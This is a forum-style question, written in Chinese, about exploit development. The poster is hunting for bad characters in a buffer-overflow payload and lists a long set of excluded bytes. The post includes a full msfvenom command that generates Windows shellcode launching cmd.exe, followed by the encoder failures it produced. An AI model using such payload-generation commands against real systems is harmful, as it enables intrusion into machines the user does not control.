我在查找坏字符时遇到了问题，因为十六进制代码被替换为 \x3F 和其他一些代码。

在这里，我拥有从 \x01 到 \xFF 的所有 256 个十六进制字符，正如您所看到的，许多十六进制字符被 \x3F 和其他字符替换，因此我无法找出坏字符。

我试图找出坏字符和被替换的字符，它们是：

\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x95\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb4\xb8\xbc\xbd\xbe

然后我使用 msfvenom 生成 shellcode 但得到低于结果。

$msfvenom -a x86 --platform windows -p windows/exec cmd=cmd.exe -b '\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x95\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb4\xb8\xbc\xbd\xbe' -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor failed with A valid encoding key could not be found.
Attempting to encode payload with 1 iterations of x86/countdown
x86/countdown failed with Encoding failed due to a bad character (index=84, char=0x0d)
Attempting to encode payload with 1 iterations of x86/fnstenv_mov
x86/fnstenv_mov failed with A valid encoding key could not be found.
Attempting to encode payload with 1 iterations of x86/jmp_call_additive
x86/jmp_call_additive failed with Encoding failed due to a bad character (index=15, char=0x85)
Attempting to encode payload with 1 iterations of x86/xor_dynamic
Error: Bad character found in stub for the Dynamic key XOR Encoder encoder.